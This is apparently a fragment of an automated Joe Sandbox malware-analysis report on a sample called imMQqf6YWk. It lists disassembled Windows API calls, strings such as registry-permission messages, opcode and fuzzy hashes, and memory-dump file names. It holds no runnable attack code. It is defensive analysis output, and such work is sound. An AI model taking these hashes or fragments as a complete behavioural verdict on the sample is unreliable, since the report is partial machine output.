                                                                              • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                              • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                              APIs
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • ShowWindow.USER32(?,00000005,00000000,00497B31,?,?,00000000), ref: 00497902
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,0049792A,00000000,00497AFD,?,?,00000005,00000000,00497B31,?,?,00000000), ref: 004072B3
                                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                                              • API String ID: 3312786188-1660910688
                                                                              • Opcode ID: 7512cdbd572c9146c7922e267a2e3ec6043e3c2241cd3ad81f3df178027fada8
                                                                              • Instruction ID: 79fbc7277211ce2bf855d188aeb365c1f4e20c687b9dac3c04c4e1571c34c8ae
                                                                              • Opcode Fuzzy Hash: 7512cdbd572c9146c7922e267a2e3ec6043e3c2241cd3ad81f3df178027fada8
                                                                              • Instruction Fuzzy Hash: 44315E34A10214AFDB01EB65DC92D5E7B75FB89718B91847AF400AB392DB38BD018B58
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                              • API String ID: 828529508-2866557904
                                                                              • Opcode ID: dc376cfddf31d7f2fdf241a02509d8c694355095d88693d0378826b1ee5e642a
                                                                              • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                              • Opcode Fuzzy Hash: dc376cfddf31d7f2fdf241a02509d8c694355095d88693d0378826b1ee5e642a
                                                                              • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                              APIs
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E78
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E99
                                                                              • CloseHandle.KERNEL32(?,00457ECC), ref: 00457EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                              • API String ID: 2573145106-3235461205
                                                                              • Opcode ID: 1ea0d3176aedc3e092b8d1903486a3d6a13cecd7bb31937a8215cd8aa9781b6e
                                                                              • Instruction ID: b72ead612c96ea1451a2df619a1119c508d9f8e19ef45bb7a80fe0c677849c01
                                                                              • Opcode Fuzzy Hash: 1ea0d3176aedc3e092b8d1903486a3d6a13cecd7bb31937a8215cd8aa9781b6e
                                                                              • Instruction Fuzzy Hash: DA01A235608304AFD711EBA9AC06A1A73A8EB49715F2040B6FC10E73D3D6389E04861D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                              • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                                              • API String ID: 3478007392-2498399450
                                                                              • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                              • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                              • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                              • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004776BC
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004777B3,0049C0A4,00000000), ref: 004776CF
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004776D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                                              • API String ID: 1782028327-3855017861
                                                                              • Opcode ID: 79b78db4dd9cdf85c2be20cd47b0727ffde78e70408e3af60258cd37bb1d66b3
                                                                              • Instruction ID: ee14923c72d036b6004e6d5d181e2ae3dde99fc96f584ef82141a9a0fe8b283c
                                                                              • Opcode Fuzzy Hash: 79b78db4dd9cdf85c2be20cd47b0727ffde78e70408e3af60258cd37bb1d66b3
                                                                              • Instruction Fuzzy Hash: 99D0C7D0249B02AAD910B3F94D47FAF365CA954768794C47B7404E218DDABCDC00D93D
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                              • SaveDC.GDI32(?), ref: 00416C83
                                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                              • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                              • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                              • String ID:
                                                                              • API String ID: 3808407030-0
                                                                              • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                              • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                              • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                              • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                              • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                              • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                              • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                              • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                              • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                              • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                              • GetDC.USER32(00000000), ref: 0041BC12
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                              • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                              • String ID:
                                                                              • API String ID: 1095203571-0
                                                                              • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                              • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                              • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                              • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                              APIs
                                                                                • Part of subcall function 0045CE9C: SetLastError.KERNEL32(00000057,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF07
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00473520,?,?,0049C1DC,00000000), ref: 004734D9
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00473520,?,?,0049C1DC,00000000), ref: 004734EF
                                                                              Strings
                                                                              • Setting permissions on registry key: %s\%s, xrefs: 0047349E
                                                                              • Failed to set permissions on registry key (%d)., xrefs: 00473500
                                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 004734E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                              • API String ID: 1452528299-4018462623
                                                                              • Opcode ID: 6a97e4f81041aadbe163303a7d14e2778330a35fec2615f3944f9ca16867819a
                                                                              • Instruction ID: f6b37ec0c80c1520313a246a851a493010c524415d82476cd93cad017a8f966b
                                                                              • Opcode Fuzzy Hash: 6a97e4f81041aadbe163303a7d14e2778330a35fec2615f3944f9ca16867819a
                                                                              • Instruction Fuzzy Hash: 76218670A042445FCB10DFA9C8826EEBBE4DF49315F50817BE508E7392D7785E05876D
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                              • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                              APIs
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                              • RealizePalette.GDI32(00000000), ref: 00414421
                                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                              • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$RealizeSelect$Release
                                                                              • String ID:
                                                                              • API String ID: 2261976640-0
                                                                              • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                              • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                              • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                              • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                              APIs
                                                                                • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                              • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                              • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                              • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                              • String ID: vLB
                                                                              • API String ID: 1477829881-1797516613
                                                                              • Opcode ID: 9987255b0b6c78362164308449554d51e9442941db4b17a29f095a444d8f0f61
                                                                              • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                              • Opcode Fuzzy Hash: 9987255b0b6c78362164308449554d51e9442941db4b17a29f095a444d8f0f61
                                                                              • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                              APIs
                                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$NameOpenResourceUniversal
                                                                              • String ID: Z
                                                                              • API String ID: 3604996873-1505515367
                                                                              • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                              • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                              • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                              • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                              APIs
                                                                              • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$EmptyRect
                                                                              • String ID:
                                                                              • API String ID: 182455014-2867612384
                                                                              • Opcode ID: 3cb455d8176bf3e5231f8dda4285d64bdc155d7a8260b5a0e5f680fe50550aac
                                                                              • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                              • Opcode Fuzzy Hash: 3cb455d8176bf3e5231f8dda4285d64bdc155d7a8260b5a0e5f680fe50550aac
                                                                              • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                              • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
